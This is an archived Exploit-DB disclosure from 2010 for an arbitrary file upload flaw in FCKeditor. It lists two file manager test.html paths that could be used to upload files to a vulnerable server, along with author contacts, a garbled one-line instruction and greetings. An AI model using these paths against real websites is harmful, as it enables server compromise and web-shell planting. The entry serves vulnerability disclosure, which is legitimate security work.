FCKEditor Core - 'FileManager test.html' Arbitrary File Upload (1)

EDB-ID:

12254

CVE:

N/A

Author:

Mr.MLL

Type:

webapps

Platform:

PHP

Published:

2010-04-16

# Title: CMS (fckeditor) Remote Arbitrary File Upload Exploit


# Author: Mr.MLL
# Published: 2010-04-15
# Verified: yes
# Download Exploit Code
# Download N/A

==================================================================================================================


[o] CMS (fckeditor)

Software : fckeditor ( version all )
Vendor : http://ckeditor.com/
Contact : 7@live.com & Y-3@hotmail.com & te1@yahoo.com
Home : http://sec-r1z.com/


==================================================================================================================


[o] Exploit

http://localhost/[path]/FCKeditor/editor/filemanager/upload/test.html

http://localhost/[path]/FCKeditor/editor/filemanager/browser/default/test.html





[o] After the piece go to the path that will set you back after graduation


==================================================================================================================


[o] Greetz



muslims hacker & All My Friends


==================================================================================================================